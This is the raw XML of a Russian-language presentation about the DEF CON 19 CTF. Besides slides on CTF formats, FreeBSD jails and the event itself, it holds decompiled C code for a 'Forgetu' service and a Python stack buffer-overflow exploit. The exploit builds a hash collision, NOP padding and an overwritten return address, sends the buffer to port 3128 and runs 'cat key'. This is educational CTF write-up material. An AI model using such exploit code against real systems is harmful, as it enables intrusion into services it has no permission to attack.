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6" r:id="rId2"/>
    <p:sldId id="343" r:id="rId3"/>
    <p:sldId id="344" r:id="rId4"/>
    <p:sldId id="341" r:id="rId5"/>
    <p:sldId id="345" r:id="rId6"/>
    <p:sldId id="342" r:id="rId7"/>
    <p:sldId id="351" r:id="rId8"/>
    <p:sldId id="347" r:id="rId9"/>
    <p:sldId id="346" r:id="rId10"/>
    <p:sldId id="348" r:id="rId11"/>
    <p:sldId id="350" r:id="rId12"/>
    <p:sldId id="349" r:id="rId13"/>
    <p:sldId id="352" r:id="rId14"/>
    <p:sldId id="353" r:id="rId15"/>
    <p:sldId id="304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2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9/22/2011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8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9/22/2011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9/22/2011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9/22/2011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1"/>
            <a:ext cx="8640960" cy="3375735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261861" y="4543401"/>
            <a:ext cx="8298485" cy="230425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32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pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DEF CON 19 CTF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" kern="0" cap="none" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2163059" y="5119465"/>
            <a:ext cx="6386946" cy="576064"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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Roman “zyx2145” Vasilenko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Forgetu</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="836712"/>
            <a:ext cx="8478688" cy="57985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}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean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__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cdecl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main(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fd_2)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{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…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 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SentDataToSocet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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="FixedSys"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Enter your data: "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0);</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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read_bytes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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0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RecvDataFromSocket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v2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v1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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean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size_t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data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0x7Fu, '\n');</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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data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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1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read_bytes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] = 0;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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hash 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0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make_hash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((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean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unsigned __int8 *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data</a:t>
            </a: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);</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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if (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hash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== 0xB33007D3 )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{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CheckJury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0);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return 0;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}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if (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hash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!= 0xFC1BE02A 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{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SentDataToSocet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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="FixedSys"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Better luck next time\n"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0);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return 0;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}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SentDataToSocet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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="FixedSys"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Stage 2: "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0);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read_bytes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_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RecvDataFromSocket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v7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v6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(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size_t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data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127, '\n');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if ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1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read_bytes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_ &lt;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0 )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return -1;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data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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1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read_bytes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_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] = 0;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hash3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make_hash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((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unsigned __int8 *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data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SentDataToSocet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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="FixedSys"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Stage 3: "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0);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RecvDataFromSocket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v11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v10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fd_2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(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size_t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data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hash3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, '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\n'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ru-RU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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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0;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}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>: ",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20200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Forgetu</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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9807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make_hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(data, debug=0):</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    hash = 0x1505</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    for c in data:</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        hash += (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(c) + (hash &lt;&lt; 5))</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        hash &amp;= 0xffffffff</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    return hash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735053"/>
            <a:ext cx="716734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Найти коллизию с </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="FixedSys"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0xFC1BE02A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="FixedSys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FixedSys"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>и переполнить буфер:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0">
              <a:latin typeface="FixedSys"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>if __name__ == "__main__":</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>= open('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>payload_new','r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>').read()</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>   ret </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>= b'\xf4\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\x04\x08'</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> = b'\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty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esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>b'\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xbc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> = b'\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>x66\x57\x47\x52\x58\x57\x0A‘ + collision(0x94</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>) + b'\x0A'+\</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>+ b'\x90'*(0x88-0x24) + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> + ret +b'\x0a' + b' ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>+\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/>
              <a:t>b'\x0a' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>b'cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> key' + b'\x0a'</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sys.argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>[1]</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>   sock = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>create_connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>((ip,3128))</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>sock.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>buf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dirty="0"/>
              <a:t>   data = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sock.recv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(1024)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>   print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>data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60984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Bunny</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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976664" cy="56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453"/>
            <a:ext cx="6840760" cy="445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04664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 10 часов до конца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125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45" y="1556792"/>
            <a:ext cx="52768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76672"/>
            <a:ext cx="418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Как проходила игра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42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ctf\afterpar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1" y="1412776"/>
            <a:ext cx="7987546" cy="49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332656"/>
            <a:ext cx="219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Afterparty</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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47667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Типы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>CTF</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="32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1197093"/>
            <a:ext cx="381592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Classic CTF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Defcon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Final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ruCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Final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 Final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Jeopardy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/>
              <a:t>Defcon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Quals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Hack.lu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ruCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Quals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iCTF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iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xD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1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892" y="116632"/>
            <a:ext cx="4248472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 err="1" smtClean="0"/>
              <a:t>Defcon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Quals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96" y="1085004"/>
            <a:ext cx="6698681" cy="574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844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967607" cy="1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18926" y="109544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4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07149"/>
            <a:ext cx="316835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21" y="150626"/>
            <a:ext cx="2634359" cy="22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96336" y="109544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8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42106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1</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="7-Point Star 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1130894" y="1280108"/>
            <a:ext cx="6681465" cy="3805076"/>
          </a:xfrm>
          <a:prstGeom prst="star7">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WTF?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6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8926" y="109544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96336" y="109544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421061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20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7" y="150626"/>
            <a:ext cx="3100008" cy="232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17" y="654169"/>
            <a:ext cx="2901702" cy="125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3160056"/>
            <a:ext cx="2307919" cy="247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62" y="459756"/>
            <a:ext cx="54006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233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495"/>
            <a:ext cx="2667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356992"/>
            <a:ext cx="86409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ru-RU" dirty="0" smtClean="0"/>
              <a:t>механизм </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>виртуализации в системе FreeBSD, позволяющий создавать внутри одной операционной системы FreeBSD несколько независимо работающих FreeBSD на том же ядре операционной системы, но совершенно независимо настраиваемых с независимым набором установленных приложений</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” (c) wiki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68340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FreeBSD Jail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375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5954"/>
            <a:ext cx="2031706" cy="20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7544" y="1422068"/>
            <a:ext cx="2448272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86037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from other team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784" y="3573016"/>
            <a:ext cx="2031706" cy="20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2164813" y="1388533"/>
            <a:ext cx="1369026" cy="3141134"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 917054 w 1369026"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3141134"/>
              <a:gd name="connsiteX1" fmla="*/ 967854 w 1369026"/>
              <a:gd name="connsiteY1" fmla="*/ 16934 h 3141134"/>
              <a:gd name="connsiteX2" fmla="*/ 993254 w 1369026"/>
              <a:gd name="connsiteY2" fmla="*/ 76200 h 3141134"/>
              <a:gd name="connsiteX3" fmla="*/ 1018654 w 1369026"/>
              <a:gd name="connsiteY3" fmla="*/ 93134 h 3141134"/>
              <a:gd name="connsiteX4" fmla="*/ 1035587 w 1369026"/>
              <a:gd name="connsiteY4" fmla="*/ 118534 h 3141134"/>
              <a:gd name="connsiteX5" fmla="*/ 1044054 w 1369026"/>
              <a:gd name="connsiteY5" fmla="*/ 143934 h 3141134"/>
              <a:gd name="connsiteX6" fmla="*/ 1027120 w 1369026"/>
              <a:gd name="connsiteY6" fmla="*/ 389467 h 3141134"/>
              <a:gd name="connsiteX7" fmla="*/ 1018654 w 1369026"/>
              <a:gd name="connsiteY7" fmla="*/ 440267 h 3141134"/>
              <a:gd name="connsiteX8" fmla="*/ 1010187 w 1369026"/>
              <a:gd name="connsiteY8" fmla="*/ 499534 h 3141134"/>
              <a:gd name="connsiteX9" fmla="*/ 1001720 w 1369026"/>
              <a:gd name="connsiteY9" fmla="*/ 524934 h 3141134"/>
              <a:gd name="connsiteX10" fmla="*/ 984787 w 1369026"/>
              <a:gd name="connsiteY10" fmla="*/ 601134 h 3141134"/>
              <a:gd name="connsiteX11" fmla="*/ 967854 w 1369026"/>
              <a:gd name="connsiteY11" fmla="*/ 660400 h 3141134"/>
              <a:gd name="connsiteX12" fmla="*/ 950920 w 1369026"/>
              <a:gd name="connsiteY12" fmla="*/ 677334 h 3141134"/>
              <a:gd name="connsiteX13" fmla="*/ 933987 w 1369026"/>
              <a:gd name="connsiteY13" fmla="*/ 711200 h 3141134"/>
              <a:gd name="connsiteX14" fmla="*/ 925520 w 1369026"/>
              <a:gd name="connsiteY14" fmla="*/ 736600 h 3141134"/>
              <a:gd name="connsiteX15" fmla="*/ 832387 w 1369026"/>
              <a:gd name="connsiteY15" fmla="*/ 812800 h 3141134"/>
              <a:gd name="connsiteX16" fmla="*/ 756187 w 1369026"/>
              <a:gd name="connsiteY16" fmla="*/ 846667 h 3141134"/>
              <a:gd name="connsiteX17" fmla="*/ 722320 w 1369026"/>
              <a:gd name="connsiteY17" fmla="*/ 863600 h 3141134"/>
              <a:gd name="connsiteX18" fmla="*/ 688454 w 1369026"/>
              <a:gd name="connsiteY18" fmla="*/ 872067 h 3141134"/>
              <a:gd name="connsiteX19" fmla="*/ 620720 w 1369026"/>
              <a:gd name="connsiteY19" fmla="*/ 914400 h 3141134"/>
              <a:gd name="connsiteX20" fmla="*/ 603787 w 1369026"/>
              <a:gd name="connsiteY20" fmla="*/ 973667 h 3141134"/>
              <a:gd name="connsiteX21" fmla="*/ 595320 w 1369026"/>
              <a:gd name="connsiteY21" fmla="*/ 1024467 h 3141134"/>
              <a:gd name="connsiteX22" fmla="*/ 578387 w 1369026"/>
              <a:gd name="connsiteY22" fmla="*/ 1049867 h 3141134"/>
              <a:gd name="connsiteX23" fmla="*/ 561454 w 1369026"/>
              <a:gd name="connsiteY23" fmla="*/ 1117600 h 3141134"/>
              <a:gd name="connsiteX24" fmla="*/ 527587 w 1369026"/>
              <a:gd name="connsiteY24" fmla="*/ 1236134 h 3141134"/>
              <a:gd name="connsiteX25" fmla="*/ 510654 w 1369026"/>
              <a:gd name="connsiteY25" fmla="*/ 1270000 h 3141134"/>
              <a:gd name="connsiteX26" fmla="*/ 502187 w 1369026"/>
              <a:gd name="connsiteY26" fmla="*/ 1295400 h 3141134"/>
              <a:gd name="connsiteX27" fmla="*/ 485254 w 1369026"/>
              <a:gd name="connsiteY27" fmla="*/ 1312334 h 3141134"/>
              <a:gd name="connsiteX28" fmla="*/ 468320 w 1369026"/>
              <a:gd name="connsiteY28" fmla="*/ 1346200 h 3141134"/>
              <a:gd name="connsiteX29" fmla="*/ 425987 w 1369026"/>
              <a:gd name="connsiteY29" fmla="*/ 1413934 h 3141134"/>
              <a:gd name="connsiteX30" fmla="*/ 409054 w 1369026"/>
              <a:gd name="connsiteY30" fmla="*/ 1439334 h 3141134"/>
              <a:gd name="connsiteX31" fmla="*/ 392120 w 1369026"/>
              <a:gd name="connsiteY31" fmla="*/ 1473200 h 3141134"/>
              <a:gd name="connsiteX32" fmla="*/ 383654 w 1369026"/>
              <a:gd name="connsiteY32" fmla="*/ 1498600 h 3141134"/>
              <a:gd name="connsiteX33" fmla="*/ 341320 w 1369026"/>
              <a:gd name="connsiteY33" fmla="*/ 1549400 h 3141134"/>
              <a:gd name="connsiteX34" fmla="*/ 324387 w 1369026"/>
              <a:gd name="connsiteY34" fmla="*/ 1600200 h 3141134"/>
              <a:gd name="connsiteX35" fmla="*/ 315920 w 1369026"/>
              <a:gd name="connsiteY35" fmla="*/ 1634067 h 3141134"/>
              <a:gd name="connsiteX36" fmla="*/ 298987 w 1369026"/>
              <a:gd name="connsiteY36" fmla="*/ 1667934 h 3141134"/>
              <a:gd name="connsiteX37" fmla="*/ 282054 w 1369026"/>
              <a:gd name="connsiteY37" fmla="*/ 1744134 h 3141134"/>
              <a:gd name="connsiteX38" fmla="*/ 248187 w 1369026"/>
              <a:gd name="connsiteY38" fmla="*/ 1803400 h 3141134"/>
              <a:gd name="connsiteX39" fmla="*/ 231254 w 1369026"/>
              <a:gd name="connsiteY39" fmla="*/ 1871134 h 3141134"/>
              <a:gd name="connsiteX40" fmla="*/ 180454 w 1369026"/>
              <a:gd name="connsiteY40" fmla="*/ 2048934 h 3141134"/>
              <a:gd name="connsiteX41" fmla="*/ 163520 w 1369026"/>
              <a:gd name="connsiteY41" fmla="*/ 2133600 h 3141134"/>
              <a:gd name="connsiteX42" fmla="*/ 129654 w 1369026"/>
              <a:gd name="connsiteY42" fmla="*/ 2209800 h 3141134"/>
              <a:gd name="connsiteX43" fmla="*/ 112720 w 1369026"/>
              <a:gd name="connsiteY43" fmla="*/ 2243667 h 3141134"/>
              <a:gd name="connsiteX44" fmla="*/ 104254 w 1369026"/>
              <a:gd name="connsiteY44" fmla="*/ 2269067 h 3141134"/>
              <a:gd name="connsiteX45" fmla="*/ 78854 w 1369026"/>
              <a:gd name="connsiteY45" fmla="*/ 2336800 h 3141134"/>
              <a:gd name="connsiteX46" fmla="*/ 70387 w 1369026"/>
              <a:gd name="connsiteY46" fmla="*/ 2421467 h 3141134"/>
              <a:gd name="connsiteX47" fmla="*/ 53454 w 1369026"/>
              <a:gd name="connsiteY47" fmla="*/ 2523067 h 3141134"/>
              <a:gd name="connsiteX48" fmla="*/ 44987 w 1369026"/>
              <a:gd name="connsiteY48" fmla="*/ 2556934 h 3141134"/>
              <a:gd name="connsiteX49" fmla="*/ 36520 w 1369026"/>
              <a:gd name="connsiteY49" fmla="*/ 2624667 h 3141134"/>
              <a:gd name="connsiteX50" fmla="*/ 19587 w 1369026"/>
              <a:gd name="connsiteY50" fmla="*/ 2768600 h 3141134"/>
              <a:gd name="connsiteX51" fmla="*/ 11120 w 1369026"/>
              <a:gd name="connsiteY51" fmla="*/ 2794000 h 3141134"/>
              <a:gd name="connsiteX52" fmla="*/ 11120 w 1369026"/>
              <a:gd name="connsiteY52" fmla="*/ 3064934 h 3141134"/>
              <a:gd name="connsiteX53" fmla="*/ 104254 w 1369026"/>
              <a:gd name="connsiteY53" fmla="*/ 3090334 h 3141134"/>
              <a:gd name="connsiteX54" fmla="*/ 188920 w 1369026"/>
              <a:gd name="connsiteY54" fmla="*/ 3115734 h 3141134"/>
              <a:gd name="connsiteX55" fmla="*/ 214320 w 1369026"/>
              <a:gd name="connsiteY55" fmla="*/ 3124200 h 3141134"/>
              <a:gd name="connsiteX56" fmla="*/ 290520 w 1369026"/>
              <a:gd name="connsiteY56" fmla="*/ 3132667 h 3141134"/>
              <a:gd name="connsiteX57" fmla="*/ 349787 w 1369026"/>
              <a:gd name="connsiteY57" fmla="*/ 3141134 h 3141134"/>
              <a:gd name="connsiteX58" fmla="*/ 679987 w 1369026"/>
              <a:gd name="connsiteY58" fmla="*/ 3132667 h 3141134"/>
              <a:gd name="connsiteX59" fmla="*/ 739254 w 1369026"/>
              <a:gd name="connsiteY59" fmla="*/ 3115734 h 3141134"/>
              <a:gd name="connsiteX60" fmla="*/ 1204920 w 1369026"/>
              <a:gd name="connsiteY60" fmla="*/ 3107267 h 3141134"/>
              <a:gd name="connsiteX61" fmla="*/ 1247254 w 1369026"/>
              <a:gd name="connsiteY61" fmla="*/ 3098800 h 3141134"/>
              <a:gd name="connsiteX62" fmla="*/ 1365787 w 1369026"/>
              <a:gd name="connsiteY62" fmla="*/ 3090334 h 3141134"/>
              <a:gd name="connsiteX63" fmla="*/ 1314987 w 1369026"/>
              <a:gd name="connsiteY63" fmla="*/ 3073400 h 3141134"/>
              <a:gd name="connsiteX64" fmla="*/ 1289587 w 1369026"/>
              <a:gd name="connsiteY64" fmla="*/ 3056467 h 3141134"/>
